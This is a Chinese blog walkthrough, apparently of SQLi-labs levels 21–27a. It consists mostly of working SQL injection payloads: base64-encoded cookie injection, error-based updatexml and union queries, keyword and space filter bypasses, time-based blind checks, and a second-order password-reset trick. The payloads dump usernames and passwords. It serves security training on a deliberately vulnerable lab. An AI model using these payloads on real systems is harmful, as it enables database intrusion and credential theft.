总字符数: 6.52K

代码: 4.84K, 文本: 0.41K

预计阅读时间: 23 分钟

21关

base64编码单引号的cookie注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-- 表
admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()  limit 3,1),0x7e),1)) and '1' = '1
YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSAgbGltaXQgMywxKSwweDdlKSwxKSkgYW5kICcxJyA9ICcx


-- 列
YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycgbGltaXQgMSwxKSwweDdlKSwxKSkgYW5kICcxJyA9ICcx


YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycgbGltaXQgMiwxKSwweDdlKSwxKSkgYW5kICcxJyA9ICcx

-- 数据
YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VybmFtZSBmcm9tIHVzZXJzICBsaW1pdCAzLDEpLDB4N2UpLDEpKSBhbmQgJzEnID0gJzE=

YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzICBsaW1pdCAzLDEpLDB4N2UpLDEpKSBhbmQgJzEnID0gJzE=

22关

base64编码双引号的cookie注入

1
2
3
4
5
6
7
8
9
10
11
12
-- 表
admin" and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()  limit 3,1),0x7e),1)) and "1" = "1
YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSAgbGltaXQgMywxKSwweDdlKSwxKSkgYW5kICIxIiA9ICIx

-- 列
YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpICBhbmQgdGFibGVfbmFtZT0ndXNlcnMnIGxpbWl0IDEsMSksMHg3ZSksMSkpIGFuZCAiMSIgPSAiMQ==

YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpICBhbmQgdGFibGVfbmFtZT0ndXNlcnMnIGxpbWl0IDIsMSksMHg3ZSksMSkpIGFuZCAiMSIgPSAiMQ==
-- 数据
YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VybmFtZSBmcm9tIHVzZXJzIGxpbWl0IDMsMSksMHg3ZSksMSkpIGFuZCAiMSIgPSAiMQ==

YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDMsMSksMHg3ZSksMSkpIGFuZCAiMSIgPSAiMQ==

23关

基于GET错误的过滤注释

分析源代码

1
2
3
4
5
6
7
8
9
10
11
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
1
2
3
4
5
6
7
8
9
10
-- 表
?id=-1' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 3,1),3  and  '1' = '1

-- 列
?id=-1' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),3  and  '1' = '1
?id=-1' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),3  and  '1' = '1

-- 表
?id=-1' union select 1,(select username from users limit 3,1),3  and  '1' = '1
?id=-1' union select 1,(select password from users limit 3,1),3  and  '1' = '1

24关

本关为二阶注入,查看源码,在修改密码时直接调用username没有进行过滤
可以注册一个新账户Dumb'#,密码为123456
登录Dumb’#账户,修改密码为password,再次使用Dumb登录发现原来的密码被修改为password

25关

本关过滤了and和or关键字,采用常规思路注入即可,注意password需要将其中or重写来绕过检测

1
2
3
4
5
6
-- 表
?id=-1' union select 1,2,group_concat('~',table_name) from infoorrmation_schema.tables where table_schema=database() --+
-- 列
?id=-1' union select 1,2,group_concat('~',column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='users' --+
-- 数据
?id=-1' union select 1,2,group_concat('~',username,passwoorrd) from users --+

25a关

本关与25基本一致,这一关只不过换成了数字型注入

1
2
3
4
5
6
-- 表
?id=-1 union select 1,2,group_concat('~',table_name) from infoorrmation_schema.tables where table_schema=database() --+
-- 列
?id=-1 union select 1,2,group_concat('~',column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='users' --+
-- 数据
?id=-1' union select 1,2,group_concat('~',username,passwoorrd) from users --+

26关

本关对大多数字符和关键字都进行了过滤,如注释符号、and、or、空格等,使用|绕过

1
2
3
4
5
6
7
8
-- 表
?id=1'%0B||updatexml(1,concat("~",(select%0Btable_name%0Bfrom%0Binfoorrmation_schema.tables%0Bwhere%0Btable_schema=database()%0Blimit%0B3,1)),1)|'1'='1
-- 列
?id=-1'%0B||updatexml(1,concat("~",(select%0Bcolumn_name%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema=database()%0Banandd%0Btable_name='users'%0Blimit%0B1,1)),1)|'1'='1
?id=-1'%0B||updatexml(1,concat("~",(select%0Bcolumn_name%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema=database()%0Banandd%0Btable_name='users'%0Blimit%0B2,1)),1)|'1'='1
-- 数据
?id=-1'%0B||updatexml(1,concat("~",(select%0Busername%0Bfrom%0Busers%0Blimit%0B3,1)),1)|'1'='1
?id=-1'%0B||updatexml(1,concat("~",(select%0Bpassword%0Bfrom%0Busers%0Blimit%0B3,1)),1)|'1'='1

26a关

时间盲注

1
?id=-1')|if(substring((database()),1,1)="s",sleep(5),1)|('1')=('1

27关

使用%0B代替空格绕过

1
?id=1'%0Band%0Bupdatexml(1,concat("~",database()),1)%0Band'1'='1

27a关

时间盲注

1
?id=1"%0Band%0Bif(substring(database(),1,1)="s",sleep(5),1)and"1"="1
许可协议

本文由 kill3r 原创,采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。

分享文章

快来参与讨论吧~